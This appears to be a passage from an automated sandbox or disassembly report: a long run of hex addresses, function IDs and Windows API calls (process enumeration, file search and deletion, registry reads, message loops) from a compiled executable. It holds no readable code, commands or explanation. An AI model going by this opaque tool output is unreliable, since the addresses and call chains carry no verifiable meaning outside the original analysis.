59 API calls 98679->98680 98681 7d6148 CharLowerBuffW 98680->98681 98683 7d615b 98681->98683 98682 781609 59 API calls 98682->98683 98683->98682 98684 7d6195 98683->98684 98696 7d6165 _memset Mailbox 98683->98696 98685 7d61a7 98684->98685 98712 781609 98684->98712 98687 790fe6 Mailbox 59 API calls 98685->98687 98690 7d61d5 98687->98690 98692 7d61f4 98690->98692 98715 7d6071 59 API calls 98690->98715 98691 7d6233 98693 790fe6 Mailbox 59 API calls 98691->98693 98691->98696 98697 7d6292 98692->98697 98694 7d624d 98693->98694 98695 790fe6 Mailbox 59 API calls 98694->98695 98695->98696 98696->98678 98698 781207 59 API calls 98697->98698 98699 7d62c4 98698->98699 98700 781207 59 API calls 98699->98700 98701 7d62cd 98700->98701 98702 781207 59 API calls 98701->98702 98707 7d62d6 _wcscmp 98702->98707 98703 781821 59 API calls 98703->98707 98704 7d65ab Mailbox 98704->98691 98705 78153b 59 API calls 98705->98707 98706 793836 GetStringTypeW 98706->98707 98707->98703 98707->98704 98707->98705 98707->98706 98709 7937ba 59 API calls 98707->98709 98710 7d6292 60 API calls 98707->98710 98711 781c9c 59 API calls 98707->98711 98716 79385c GetStringTypeW _iswctype 98707->98716 98709->98707 98710->98707 98711->98707 98713 781aa4 59 API calls 98712->98713 98714 781614 98713->98714 98714->98685 98715->98690 98716->98707 98727 7d4ce2 98717->98727 98719 7d4195 Process32NextW 98720 7d4244 FindCloseChangeNotification 98719->98720 98721 7d418e Mailbox 98719->98721 98720->98344 98721->98719 98721->98720 98722 781207 59 API calls 98721->98722 98723 781a36 59 API calls 98721->98723 98733 790119 98721->98733 98784 7817e0 59 API calls Mailbox 98721->98784 98785 78151f 61 API calls 98721->98785 98722->98721 98723->98721 98728 7d4d09 98727->98728 98729 7d4cf0 98727->98729 98787 7937c3 98728->98787 98729->98728 98732 7d4d0f 98729->98732 98786 79385c GetStringTypeW _iswctype 98729->98786 98732->98721 98734 781207 59 API calls 98733->98734 98735 79012f 98734->98735 98736 781207 59 API calls 98735->98736 98737 790137 98736->98737 98738 781207 59 API calls 98737->98738 98739 79013f 98738->98739 98740 781207 59 API calls 98739->98740 98741 790147 98740->98741 98742 7c627d 98741->98742 98743 79017b 98741->98743 98744 781c9c 59 API calls 98742->98744 98745 781462 59 API calls 98743->98745 98746 7c6286 98744->98746 98747 790189 98745->98747 98824 7819e1 98746->98824 98749 781981 59 API calls 98747->98749 98750 790193 98749->98750 98752 7901be 98750->98752 98753 781462 59 API calls 98750->98753 98751 7901fe 98754 781462 59 API calls 98751->98754 98752->98751 98755 7901dd 98752->98755 98765 7c62a6 98752->98765 98756 7901b4 98753->98756 98760 79020f 98754->98760 98759 781609 59 API calls 98755->98759 98758 781981 59 API calls 98756->98758 98757 7c6376 98761 781821 59 API calls 98757->98761 98758->98752 98762 7901e7 98759->98762 98763 790221 98760->98763 98766 781c9c 59 API calls 98760->98766 98779 7c6333 98761->98779 98762->98751 98770 781462 59 API calls 98762->98770 98764 790231 98763->98764 98767 781c9c 59 API calls 98763->98767 98769 790238 98764->98769 98771 781c9c 59 API calls 98764->98771 98765->98757 98768 7c635f 98765->98768 98778 7c62dd 98765->98778 98766->98763 98767->98764 98768->98757 98774 7c634a 98768->98774 98772 781c9c 59 API calls 98769->98772 98781 79023f Mailbox 98769->98781 98770->98751 98771->98769 98772->98781 98773 781609 59 API calls 98773->98779 98777 781821 59 API calls 98774->98777 98775 7c633b 98776 781821 59 API calls 98775->98776 98776->98779 98777->98779 98778->98775 98782 7c6326 98778->98782 98779->98751 98779->98773 98828 78153b 59 API calls 2 library calls 98779->98828 98781->98721 98783 781821 59 API calls 98782->98783 98783->98779 98784->98721 98785->98721 98786->98729 98790 79afce 98787->98790 98791 79afe5 98790->98791 98794 79acfe 98791->98794 98808 7930a5 98794->98808 98796 79ad35 98816 798d58 58 API calls __getptd_noexit 98796->98816 98798 79ad4a 98818 79aff8 GetStringTypeW 98798->98818 98800 79ad3a 98817 798fe6 9 API calls __write 98800->98817 98803 79ad63 98807 79ad80 wcstoxq __aulldvrm 98803->98807 98819 79aff8 GetStringTypeW 98803->98819 98804 7937d2 98804->98732 98807->98804 98820 798d58 58 API calls __getptd_noexit 98807->98820 98809 7930b6 98808->98809 98815 793103 98808->98815 98821 799bdc 58 API calls 2 library calls 98809->98821 98811 7930bc 98812 7930e3 98811->98812 98822 7992b0 58 API calls 6 library calls 98811->98822 98812->98815 98823 799632 58 API calls 6 library calls 98812->98823 98815->98796 98815->98798 98816->98800 98817->98804 98818->98803 98819->98803 98820->98804 98821->98811 98822->98812 98823->98815 98825 7819fb 98824->98825 98827 7819ee 98824->98827 98826 790fe6 Mailbox 59 API calls 98825->98826 98826->98827 98827->98752 98828->98779 98830 7ea918 98829->98830 98831 7ea970 98829->98831 98832 790fe6 Mailbox 59 API calls 98830->98832 98831->98351 98835 7ea93a 98832->98835 98833 790fe6 Mailbox 59 API calls 98833->98835 98835->98831 98835->98833 98903 7c715b 59 API calls Mailbox 98835->98903 98837 7d78ac 98836->98837 98838 7d78e3 98836->98838 98837->98838 98839 790fe6 Mailbox 59 API calls 98837->98839 98840 7c6ebc 98838->98840 98839->98838 98841 7c6f06 98840->98841 98845 7c6f1c Mailbox 98840->98845 98842 781a36 59 API calls 98841->98842 98842->98845 98843 7c6f5a 98904 77a820 98843->98904 98844 7c6f47 98846 7ec355 278 API calls 98844->98846 98845->98843 98845->98844 98852 7c6f53 98846->98852 98849 7c7002 98849->98378 98850 7c6f91 98851 7c6fdc 98850->98851 98850->98852 98854 7c6fc1 98850->98854 98851->98852 98928 7da48d 89 API calls 4 library calls 98851->98928 98929 7c6cf1 59 API calls Mailbox 98852->98929 98921 7c706d 98854->98921 98856->98378 98857->98360 98858->98366 99046 783740 98859->99046 98862 7b30b6 99147 7da48d 89 API calls 4 library calls 98862->99147 98863 77b07f 98863->98862 98865 7b30d4 98863->98865 98883 77bb86 98863->98883 98898 77b132 Mailbox _memmove 98863->98898 99148 7da48d 89 API calls 4 library calls 98865->99148 98867 7b355e 98880 77b4dd 98867->98880 99178 7da48d 89 API calls 4 library calls 98867->99178 98868 7b318a 98868->98880 99150 7da48d 89 API calls 4 library calls 98868->99150 98870 7c730a 59 API calls 98870->98898 98874 7b3106 98874->98868 99149 77a9de 278 API calls 98874->99149 98877 7753b0 278 API calls 98877->98898 98878 790fe6 59 API calls Mailbox 98878->98898 98879 773b31 59 API calls 98879->98898 98880->98378 99146 7da48d 89 API calls 4 library calls 98883->99146 98884 7b3418 98885 7753b0 278 API calls 98884->98885 98887 7b3448 98885->98887 98887->98880 99172 7739be 98887->99172 98890 773c30 68 API calls 98890->98898 98891 7b31c3 99151 7da48d 89 API calls 4 library calls 98891->99151 98893 7b346f 99176 7da48d 89 API calls 4 library calls 98893->99176 98896 781c9c 59 API calls 98896->98898 98897 775190 Mailbox 59 API calls 98897->98898 98898->98867 98898->98870 98898->98874 98898->98877 98898->98878 98898->98879 98898->98880 98898->98883 98898->98884 98898->98890 98898->98891 98898->98893 98898->98896 98898->98897 98899 77523c 59 API calls 98898->98899 99051 773add 98898->99051 99058 77bc70 98898->99058 99135 773a40 98898->99135 99152 7c6c62 59 API calls 2 library calls 98898->99152 99153 7ea9c3 85 API calls Mailbox 98898->99153 99154 7c6c1e 59 API calls Mailbox 98898->99154 99155 7d5ef2 68 API calls 98898->99155 99156 773ea3 98898->99156 99177 7da12a 59 API calls 98898->99177 98899->98898 98901->98379 98902->98383 98903->98835 98905 7b2d51 98904->98905 98908 77a84c 98904->98908 98931 7da48d 89 API calls 4 library calls 98905->98931 98907 7b2d62 98907->98850 98909 7b2d6a 98908->98909 98916 77a888 _memmove 98908->98916 98932 7da48d 89 API calls 4 library calls 98909->98932 98912 790fe6 59 API calls Mailbox 98912->98916 98913 7b2dae 98933 77a9de 278 API calls 98913->98933 98914 7753b0 278 API calls 98914->98916 98916->98912 98916->98913 98916->98914 98917 7b2dc8 98916->98917 98918 77a975 98916->98918 98919 77a962 98916->98919 98917->98918 98934 7da48d 89 API calls 4 library calls 98917->98934 98918->98850 98919->98918 98930 7ea9c3 85 API calls Mailbox 98919->98930 98922 7c7085 98921->98922 98927 7ef1b2 91 API calls 98922->98927 98935 7e495b 98922->98935 98944 7d413a 98922->98944 98947 77ec83 98922->98947 98923 7c70d9 98923->98852 98927->98923 98928->98852 98929->98849 98930->98918 98931->98907 98932->98918 98933->98917 98934->98918 98936 790fe6 Mailbox 59 API calls 98935->98936 98937 7e496c 98936->98937 98938 78433f 59 API calls 98937->98938 98939 7e4976 98938->98939 98940 774d37 84 API calls 98939->98940 98941 7e498d GetEnvironmentVariableW 98940->98941 99022 7d7a51 59 API calls Mailbox 98941->99022 98943 7e49aa 98943->98923 99023 7d494a GetFileAttributesW 98944->99023 98948 774d37 84 API calls 98947->98948 98949 77eca2 98948->98949 98950 774d37 84 API calls 98949->98950 98951 77ecb7 98950->98951 98952 774d37 84 API calls 98951->98952 98953 77ecca 98952->98953 98954 774d37 84 API calls 98953->98954 98955 77ece0 98954->98955 98956 78162d 59 API calls 98955->98956 98957 77ecf4 98956->98957 98958 77ed19 98957->98958 99039 77502b 59 API calls 98957->99039 98960 7b5b67 98958->98960 98988 77ed43 __wopenfile 98958->98988 98961 7747be 59 API calls 98960->98961 98963 7b5b7a 98961->98963 98962 77ef3e 98964 7747be 59 API calls 98962->98964 98965 774540 59 API calls 98963->98965 98968 7b5d4a 98964->98968 98966 7b5b8c 98965->98966 98972 7743d0 59 API calls 98966->98972 99000 7b5bb1 98966->99000 98967 774d37 84 API calls 98969 77edca 98967->98969 98970 7b5d53 98968->98970 98971 7b5d97 98968->98971 98973 774d37 84 API calls 98969->98973 98976 774540 59 API calls 98970->98976 98974 774540 59 API calls 98971->98974 98972->99000 98977 77eddf 98973->98977 98978 7b5da1 98974->98978 98975 77ef0c Mailbox 98975->98923 98981 7b5d5e 98976->98981 98977->98962 98984 7747be 59 API calls 98977->98984 98982 7743d0 59 API calls 98978->98982 98980 7b5c0f 98980->98962 98990 774540 59 API calls 98980->98990 98983 774d37 84 API calls 98981->98983 98985 7b5dbd 98982->98985 98987 7b5d70 98983->98987 98989 77edfe 98984->98989 98998 774d37 84 API calls 98985->98998 98986 77477a 59 API calls 98986->99000 99043 781364 59 API calls 2 library calls 98987->99043 98988->98962 98988->98967 98988->98980 99012 77ee30 __wopenfile 98988->99012 98989->98980 98992 77ee09 98989->98992 98994 7b5c76 98990->98994 98997 774540 59 API calls 98992->98997 98993 7743d0 59 API calls 98993->99000 99001 7743d0 59 API calls 98994->99001 98995 7b5d84 98996 77477a 59 API calls 98995->98996 99002 7b5d92 98996->99002 99003 77ee18 98997->99003 99004 7b5dd8 98998->99004 99000->98975 99000->98986 99000->98993 99041 781364 59 API calls 2 library calls 99000->99041 99001->99012 99008 7743d0 59 API calls 99002->99008 99005 7819e1 59 API calls 99003->99005 99044 781364 59 API calls 2 library calls 99004->99044 99005->99012 99007 77477a 59 API calls 99007->99012 99008->98975 99009 7b5dec 99010 77477a 59 API calls 99009->99010 99010->99002 99011 7743d0 59 API calls 99011->99012 99012->98975 99012->99007 99012->99011 99014 7b5cc2 99012->99014 99040 781364 59 API calls 2 library calls 99012->99040 99013 7b5cfb 99027 77477a 99013->99027 99014->99013 99015 7b5cec 99014->99015 99042 78153b 59 API calls 2 library calls 99015->99042 99020 7b5d1c 99021 7819e1 59 API calls 99020->99021 99021->98962 99022->98943 99024 7d413f 99023->99024 99025 7d4965 FindFirstFileW 99023->99025 99024->98923 99025->99024 99026 7d497a FindClose 99025->99026 99026->99024 99028 790fe6 Mailbox 59 API calls 99027->99028 99029 774787 99028->99029 99030 7743d0 99029->99030 99031 7ad6c9 99030->99031 99036 7743e7 99030->99036 99031->99036 99045 7740cb 59 API calls Mailbox 99031->99045 99033 774530 99035 77523c 59 API calls 99033->99035 99034 7744e8 99037 790fe6 Mailbox 59 API calls 99034->99037 99038 7744ef 99035->99038 99036->99033 99036->99034 99036->99038 99037->99038 99038->99020 99039->98958 99040->99012 99041->99000 99042->98962 99043->98995 99044->99009 99045->99036 99047 78374f 99046->99047 99050 78376a 99046->99050 99048 781aa4 59 API calls 99047->99048 99049 783757 CharUpperBuffW 99048->99049 99049->99050 99050->98863 99052 7ad3cd 99051->99052 99053 773aee 99051->99053 99054 790fe6 Mailbox 59 API calls 99053->99054 99055 773af5 99054->99055 99056 773b16 99055->99056 99179 773ba5 59 API calls Mailbox 99055->99179 99056->98898 99059 7b359f 99058->99059 99069 77bc95 99058->99069 99272 7da48d 89 API calls 4 library calls 99059->99272 99061 77bf3b 99061->98898 99068 77c2ca LockWindowUpdate DestroyWindow GetMessageW 99068->99061 99070 77c2fc 99068->99070 99120 77bca5 Mailbox 99069->99120 99273 775376 60 API calls 99069->99273 99274 7c700c 278 API calls 99069->99274 99071 7b4509 TranslateMessage DispatchMessageW GetMessageW 99070->99071 99071->99061 99071->99071 99072 7b36b3 Sleep 99072->99120 99073 77bf54 timeGetTime 99073->99120 99075 7b405d WaitForSingleObject 99077 7b407d GetExitCodeProcess CloseHandle 99075->99077 99075->99120 99076 77c210 Sleep 99076->99120 99085 77c36b 99077->99085 99078 781c9c 59 API calls 99078->99120 99079 781207 59 API calls 99111 7b3895 Mailbox 99079->99111 99080 7b43a9 Sleep 99080->99111 99081 790fe6 59 API calls Mailbox 99081->99120 99085->98898 99086 77c324 timeGetTime 99271 775376 60 API calls 99086->99271 99088 7d4148 66 API calls 99088->99111 99090 7b4440 GetExitCodeProcess 99094 7b446c CloseHandle 99090->99094 99095 7b4456 WaitForSingleObject 99090->99095 99091 774d37 84 API calls 99091->99120 99093 776d79 109 API calls 99093->99120 99094->99111 99095->99094 99095->99120 99096 7f6562 110 API calls 99096->99111 99098 775376 60 API calls 99098->99120 99099 7b38aa Sleep 99099->99120 99100 7b44c8 Sleep 99100->99120 99101 781a36 59 API calls 99101->99111 99106 773ea3 68 API calls 99106->99111 99107 7753b0 256 API calls 99107->99120 99108 77c26d 99114 781a36 59 API calls 99108->99114 99109 77b020 256 API calls 99109->99120 99111->99079 99111->99085 99111->99088 99111->99090 99111->99096 99111->99099 99111->99100 99111->99101 99111->99106 99111->99120 99280 7d2baf 60 API calls 99111->99280 99281 775376 60 API calls 99111->99281 99282 776cd8 278 API calls 99111->99282 99284 790859 timeGetTime 99111->99284 99112 781a36 59 API calls 99112->99120 99116 77bf25 Mailbox 99114->99116 99115 7ec355 256 API calls 99115->99120 99116->99061 99241 77c460 99116->99241 99118 7da48d 89 API calls 99118->99120 99119 77a820 256 API calls 99119->99120 99120->99072 99120->99073 99120->99075 99120->99076 99120->99078 99120->99080 99120->99081 99120->99085 99120->99086 99120->99091 99120->99093 99120->99098 99120->99107 99120->99108 99120->99109 99120->99111 99120->99112 99120->99115 99120->99116 99120->99118 99120->99119 99121 773a40 59 API calls 99120->99121 99122 7739be 68 API calls 99120->99122 99123 7c6cf1 59 API calls Mailbox 99120->99123 99124 7b3e13 VariantClear 99120->99124 99125 7b3ea9 VariantClear 99120->99125 99126 7b3c57 VariantClear 99120->99126 99127 7741c4 59 API calls Mailbox 99120->99127 99128 7c7aad 59 API calls 99120->99128 99129 773ea3 68 API calls 99120->99129 99130 776cd8 256 API calls 99120->99130 99131 775190 59 API calls Mailbox 99120->99131 99132 7ee60c 130 API calls 99120->99132 99180 7752b0 99120->99180 99189 779a00 99120->99189 99196 779c80 99120->99196 99227 7dc270 99120->99227 99234 7f64b2 99120->99234 99260 7d57ff 99120->99260 99270 790859 timeGetTime 99120->99270 99275 7f6655 59 API calls 99120->99275 99276 7da058 59 API calls Mailbox 99120->99276 99277 7ce0aa 59 API calls 99120->99277 99278 7c6c62 59 API calls 2 library calls 99120->99278 99279 7738ff 59 API calls 99120->99279 99283 7c70e2 59 API calls 99120->99283 99121->99120 99122->99120 99123->99120 99124->99120 99125->99120 99126->99120 99127->99120 99128->99120 99129->99120 99130->99120 99131->99120 99132->99120 99136 7ad3b1 99135->99136 99139 773a53 99135->99139 99137 7ad3c1 99136->99137 99374 7c6d17 59 API calls 99136->99374 99140 773a7d 99139->99140 99141 773a9a Mailbox 99139->99141 99142 773b31 59 API calls 99139->99142 99143 773a83 99140->99143 99366 773b31 99140->99366 99141->98898 99142->99140 99143->99141 99145 775190 Mailbox 59 API calls 99143->99145 99145->99141 99146->98862 99147->98880 99148->98880 99149->98868 99150->98880 99151->98880 99152->98898 99153->98898 99154->98898 99155->98898 99375 773c30 99156->99375 99158 773eb3 99159 773f2d 99158->99159 99160 773ebd 99158->99160 99162 77523c 59 API calls 99159->99162 99161 790fe6 Mailbox 59 API calls 99160->99161 99163 773ece 99161->99163 99171 773f1d 99162->99171 99164 773edc 99163->99164 99165 781207 59 API calls 99163->99165 99166 773eeb 99164->99166 99167 781bcc 59 API calls 99164->99167 99165->99164 99168 790fe6 Mailbox 59 API calls 99166->99168 99167->99166 99169 773ef5 99168->99169 99382 773bc8 68 API calls 99169->99382 99171->98898 99173 7739c9 99172->99173 99174 773ea3 68 API calls 99173->99174 99175 7739f0 99173->99175 99174->99175 99175->98893 99176->98880 99177->98898 99178->98880 99179->99056 99181 7752c6 99180->99181 99185 775313 99180->99185 99182 7752d3 PeekMessageW 99181->99182 99181->99185 99183 7752ec 99182->99183 99182->99185 99183->99120 99185->99183 99186 775352 TranslateMessage DispatchMessageW 99185->99186 99187 77533e PeekMessageW 99185->99187 99188 7adf68 TranslateAcceleratorW 99185->99188 99285 77359e 99185->99285 99186->99187 99187->99183 99187->99185 99188->99185 99188->99187 99190 779a1d 99189->99190 99191 779a31 99189->99191 99290 7794e0 278 API calls 2 library calls 99190->99290 99291 7da48d 89 API calls 4 library calls 99191->99291 99194 779a28 99194->99120 99195 7b2478 99195->99195 99197 779cb5 99196->99197 99198 779d1f 99197->99198 99199 7b247d 99197->99199 99209 779d79 99197->99209 99204 781207 59 API calls 99198->99204 99198->99209 99200 7753b0 278 API calls 99199->99200 99201 7b2492 99200->99201 99226 779f50 Mailbox 99201->99226 99292 7da48d 89 API calls 4 library calls 99201->99292 99202 781207 59 API calls 99202->99209 99205 7b24d8 99204->99205 99207 792f70 __cinit 67 API calls 99205->99207 99206 792f70 __cinit 67 API calls 99206->99209 99207->99209 99208 7b24fa 99208->99120 99209->99202 99209->99206 99209->99208 99212 779f3a 99209->99212 99209->99226 99210 7739be 68 API calls 99210->99226 99212->99226 99293 7da48d 89 API calls 4 library calls 99212->99293 99213 774230 59 API calls 99213->99226 99214 7753b0 278 API calls 99214->99226 99215 77a775 99297 7da48d 89 API calls 4 library calls 99215->99297 99218 775190 Mailbox 59 API calls 99218->99226 99219 7b27f9 99219->99120 99221 7da48d 89 API calls 99221->99226 99223 781bcc 59 API calls 99223->99226 99225 77a058 99225->99120 99226->99210 99226->99213 99226->99214 99226->99215 99226->99218 99226->99221 99226->99223 99226->99225 99294 7c7aad 59 API calls 99226->99294 99295 7eccac 278 API calls 99226->99295 99296 7ebc26 278 API calls Mailbox 99226->99296 99298 7e9ab0 278 API calls Mailbox 99226->99298 99228 774d37 84 API calls 99227->99228 99229 7dc286 99228->99229 99299 7d4005 99229->99299 99231 7dc28e 99232 7dc292 GetLastError 99231->99232 99233 7dc2a7 99231->99233 99232->99233 99233->99120 99339 7f65c1 99234->99339 99236 7f64c0 99237 77bc70 278 API calls 99236->99237 99238 7f64eb 99237->99238 99239 77523c 59 API calls 99238->99239 99240 7f6503 99239->99240 99240->99120 99357 7902d4 99241->99357 99243 77c46d 99244 77c2b6 99243->99244 99245 7b45dc 99243->99245 99244->99061 99248 77c483 99244->99248 99361 7d77eb 7 API calls Mailbox 99245->99361 99362 7d77eb 7 API calls Mailbox 99245->99362 99249 781a36 59 API calls 99248->99249 99250 77c4ad 99249->99250 99251 773ea3 68 API calls 99250->99251 99252 77c4c2 Mailbox 99251->99252 99253 781a36 59 API calls 99252->99253 99254 77c4ef 99253->99254 99255 773ea3 68 API calls 99254->99255 99258 77c500 Mailbox 99255->99258 99256 77c524 99256->99068 99258->99256 99364 775376 60 API calls 99258->99364 99365 7c700c 278 API calls 99258->99365 99261 7d587d 99260->99261 99262 7d580c 99260->99262 99261->99120 99263 7d580e Sleep 99262->99263 99265 7d5817 QueryPerformanceCounter 99262->99265 99263->99261 99265->99263 99266 7d5825 QueryPerformanceFrequency 99265->99266 99267 7d582f Sleep QueryPerformanceCounter 99266->99267 99268 7d5870 99267->99268 99268->99267 99269 7d5874 99268->99269 99269->99261 99270->99120 99271->99120 99272->99069 99273->99069 99274->99069 99275->99120 99276->99120 99277->99120 99278->99120 99279->99120 99280->99111 99281->99111 99282->99111 99283->99120 99284->99111 99286 7735e2 99285->99286 99288 7735b0 99285->99288 99286->99185 99287 7735d5 IsDialogMessageW 99287->99286 99287->99288 99288->99286 99288->99287 99289 7ad273 GetClassLongW 99288->99289 99289->99287 99289->99288 99290->99194 99291->99195 99292->99226 99293->99226 99294->99226 99295->99226 99296->99226 99297->99219 99298->99226 99300 781207 59 API calls 99299->99300 99301 7d4024 99300->99301 99302 781207 59 API calls 99301->99302 99303 7d402d 99302->99303 99304 781207 59 API calls 99303->99304 99305 7d4036 99304->99305 99324 790284 99305->99324 99310 7d405c 99311 790119 59 API calls 99310->99311 99313 7d4070 FindFirstFileW 99311->99313 99312 781900 59 API calls 99312->99310 99314 7d40fc FindClose 99313->99314 99315 7d408f 99313->99315 99318 7d4107 Mailbox 99314->99318 99315->99314 99319 7d4093 99315->99319 99316 7d40d7 FindNextFileW 99316->99315 99316->99319 99317 781c9c 59 API calls 99317->99319 99318->99231 99319->99315 99319->99316 99319->99317 99321 781900 59 API calls 99319->99321 99336 7817e0 59 API calls Mailbox 99319->99336 99322 7d40c8 DeleteFileW 99321->99322 99322->99316 99323 7d40f3 FindClose 99322->99323 99323->99318 99337 7a1b70 99324->99337 99327 7902cd 99329 7819e1 59 API calls 99327->99329 99328 7902b0 99330 781821 59 API calls 99328->99330 99331 7902bc 99329->99331 99330->99331 99332 78133d 59 API calls 99331->99332 99333 7902c8 99332->99333 99334 7d4fec GetFileAttributesW 99333->99334 99335 7d404a 99334->99335 99335->99310 99335->99312 99336->99319 99338 790291 GetFullPathNameW 99337->99338 99338->99327 99338->99328 99345 776de9 99339->99345 99342 7f65e2 timeGetTime 99342->99236 99346 77523c 59 API calls 99345->99346 99347 776e03 99346->99347 99348 7af40f 99347->99348 99349 776e0d 99347->99349 99351 781821 59 API calls 99348->99351 99350 774d37 84 API calls 99349->99350 99352 776e1a 99350->99352 99353 7af41f 99351->99353 99354 781c9c 59 API calls 99352->99354 99353->99353 99355 776e28 99354->99355 99355->99342 99356 77502b 59 API calls 99355->99356 99356->99342 99360 7902df 99357->99360 99358 7902e7 99358->99243 99360->99358 99363 7e2db2 InternetCloseHandle InternetCloseHandle WaitForSingleObject 99360->99363 99361->99243 99362->99243 99363->99360 99364->99258 99365->99258 99367 773b3f 99366->99367 99373 773b67 99366->99373 99368 773b4d 99367->99368 99370 773b31 59 API calls 99367->99370 99369 773b53 99368->99369 99371 773b31 59 API calls 99368->99371 99372 775190 Mailbox 59 API calls 99369->99372 99369->99373 99370->99368 99371->99369 99372->99373 99373->99143 99374->99137 99376 773c43 99375->99376 99377 773e11 99375->99377 99378 781207 59 API calls 99376->99378 99381 773c54 99376->99381 99377->99158 99379 773e73 99378->99379 99380 792f70 __cinit 67 API calls 99379->99380 99380->99381 99381->99158 99382->99171 99383->98390 99384 77107d 99389 782fc5 99384->99389 99386 77108c 99387 792f70 __cinit 67 API calls 99386->99387 99388 771096 99387->99388 99390 782fd5 __write_nolock 99389->99390 99391 781207 59 API calls 99390->99391 99392 78308b 99391->99392 99420 7900cf 99392->99420 99394 783094 99427 7908c1 99394->99427 99397 781900 59 API calls 99398 7830ad 99397->99398 99433 784c94 99398->99433 99401 781207 59 API calls 99402 7830c5 99401->99402 99403 7819e1 59 API calls 99402->99403 99404 7830ce RegOpenKeyExW 99403->99404 99405 7c01a3 RegQueryValueExW 99404->99405 99409 7830f0 Mailbox 99404->99409 99406 7c0235 RegCloseKey 99405->99406 99407 7c01c0 99405->99407 99406->99409 99419 7c0247 _wcscat Mailbox __wsetenvp 99406->99419 99408 790fe6 Mailbox 59 API calls 99407->99408 99410 7c01d9 99408->99410 99409->99386 99412 78433f 59 API calls 99410->99412 99411 781609 59 API calls 99411->99419 99413 7c01e4 RegQueryValueExW 99412->99413 99414 7c0201 99413->99414 99416 7c021b 99413->99416 99415 781821 59 API calls 99414->99415 99415->99416 99416->99406 99417 781a36 59 API calls 99417->99419 99418 784c94 59 API calls 99418->99419 99419->99409 99419->99411 99419->99417 99419->99418 99421 7a1b70 __write_nolock 99420->99421 99422 7900dc GetModuleFileNameW 99421->99422 99423 781a36 59 API calls 99422->99423 99424 790102 99423->99424 99425 790284 60 API calls 99424->99425 99426 79010c Mailbox 99425->99426 99426->99394 99428 7a1b70 __write_nolock 99427->99428 99429 7908ce GetFullPathNameW 99428->99429 99430 7908f0 99429->99430 99431 781821 59 API calls 99430->99431 99432 78309f 99431->99432 99432->99397 99434 784ca2 99433->99434 99438 784cc4 _memmove 99433->99438 99436 790fe6 Mailbox 59 API calls 99434->99436 99435 790fe6 Mailbox 59 API calls 99437 7830bc 99435->99437 99436->99438 99437->99401 99438->99435 99439 7adcb4 99440 790fe6 Mailbox 59 API calls 99439->99440 99441 7adcbb 99440->99441 99443 774e77 99441->99443 99444 7d5f90 99441->99444 99445 7d5fb3 99444->99445 99446 7d6066 99445->99446 99447 790fe6 Mailbox 59 API calls 99445->99447 99446->99443 99448 7d5fef 99447->99448 99449 7d600e 99448->99449 99452 7d6071 59 API calls 99448->99452 99449->99446 99451 781c9c 59 API calls 99449->99451 99451->99449 99452->99448 99453 771066 99458 77aaaa 99453->99458 99455 77106c 99456 792f70 __cinit 67 API calls 99455->99456 99457 771076 99456->99457 99459 77aacb 99458->99459 99491 7902eb 99459->99491 99463 77ab12 99464 781207 59 API calls 99463->99464 99465 77ab1c 99464->99465 99466 781207 59 API calls 99465->99466 99467 77ab26 99466->99467 99468 781207 59 API calls 99467->99468 99469 77ab30 99468->99469 99470 781207 59 API calls 99469->99470 99471 77ab6e 99470->99471 99472 781207 59 API calls 99471->99472 99473 77ac39 99472->99473 99501 790588 99473->99501 99477 77ac6b 99478 781207 59 API calls 99477->99478 99479 77ac75 99478->99479 99529 78fe2b 99479->99529 99481 77acbc 99482 77accc GetStdHandle 99481->99482 99483 7b2f39 99482->99483 99484 77ad18 99482->99484 99483->99484 99486 7b2f42 99483->99486 99485 77ad20 OleInitialize 99484->99485 99485->99455 99536 7d70f3 64 API calls Mailbox 99486->99536 99488 7b2f49 99537 7d77c2 CreateThread 99488->99537 99490 7b2f55 CloseHandle 99490->99485 99538 7903c4 99491->99538 99494 7903c4 59 API calls 99495 79032d 99494->99495 99496 781207 59 API calls 99495->99496 99497 790339 99496->99497 99498 781821 59 API calls 99497->99498 99499 77aad1 99498->99499 99500 7907bb 6 API calls 99499->99500 99500->99463 99502 781207 59 API calls 99501->99502 99503 790598 99502->99503 99504 781207 59 API calls 99503->99504 99505 7905a0 99504->99505 99545 7810c3 99505->99545 99508 7810c3 59 API calls 99509 7905b0 99508->99509 99510 781207 59 API calls 99509->99510 99511 7905bb 99510->99511 99512 790fe6 Mailbox 59 API calls 99511->99512 99513 77ac43 99512->99513 99514 78ff4c 99513->99514 99515 78ff5a 99514->99515 99516 781207 59 API calls 99515->99516 99517 78ff65 99516->99517 99518 781207 59 API calls 99517->99518 99519 78ff70 99518->99519 99520 781207 59 API calls 99519->99520 99521 78ff7b 99520->99521 99522 781207 59 API calls 99521->99522 99523 78ff86 99522->99523 99524 7810c3 59 API calls 99523->99524 99525 78ff91 99524->99525 99526 790fe6 Mailbox 59 API calls 99525->99526 99527 78ff98 RegisterWindowMessageW 99526->99527 99527->99477 99530 7c620c 99529->99530 99531 78fe3b 99529->99531 99548 7da12a 59 API calls 99530->99548 99533 790fe6 Mailbox 59 API calls 99531->99533 99535 78fe43 99533->99535 99534 7c6217 99535->99481 99536->99488 99537->99490 99549 7d77a8 65 API calls 99537->99549 99539 781207 59 API calls 99538->99539 99540 7903cf 99539->99540 99541 781207 59 API calls 99540->99541 99542 7903d7 99541->99542 99543 781207 59 API calls 99542->99543 99544 790323 99543->99544 99544->99494 99546 781207 59 API calls 99545->99546 99547 7810cb 99546->99547 99547->99508 99548->99534 99550 7d92c8 99551 7d92db 99550->99551 99552 7d92d5 99550->99552 99554 7d92ec 99551->99554 99555 792f85 _free 58 API calls 99551->99555 99553 792f85 _free 58 API calls 99552->99553 99553->99551 99556 7d92fe 99554->99556 99557 792f85 _free 58 API calls 99554->99557 99555->99554 99557->99556 99558 7ab7ad 99561 77ad98 99558->99561 99562 77add7 mciSendStringW 99561->99562 99563 7b2f63 DestroyWindow 99561->99563 99564 77adf3 99562->99564 99565 77afc0 99562->99565 99574 7b2f6f 99563->99574 99567 77ae01 99564->99567 99564->99574 99565->99564 99566 77afcf UnregisterHotKey 99565->99566 99566->99565 99595 77c71f 99567->99595 99569 7b2fb4 99575 7b2fc7 FreeLibrary 99569->99575 99576 7b2fd8 99569->99576 99571 7b2f8d FindClose 99571->99574 99572 77ae16 99572->99576 99582 77ae24 99572->99582 99574->99569 99574->99571 99601 7842cf 99574->99601 99575->99569 99577 7b2fec VirtualFree 99576->99577 99579 77ae91 99576->99579 99577->99576 99578 77ae80 OleUninitialize 99578->99579 99580 7b3033 99579->99580 99581 77ae9c 99579->99581 99585 7b3042 99580->99585 99605 7da240 CloseHandle 99580->99605 99583 77aeac Mailbox 99581->99583 99582->99578 99599 78fef1 61 API calls Mailbox 99583->99599 99591 7b3056 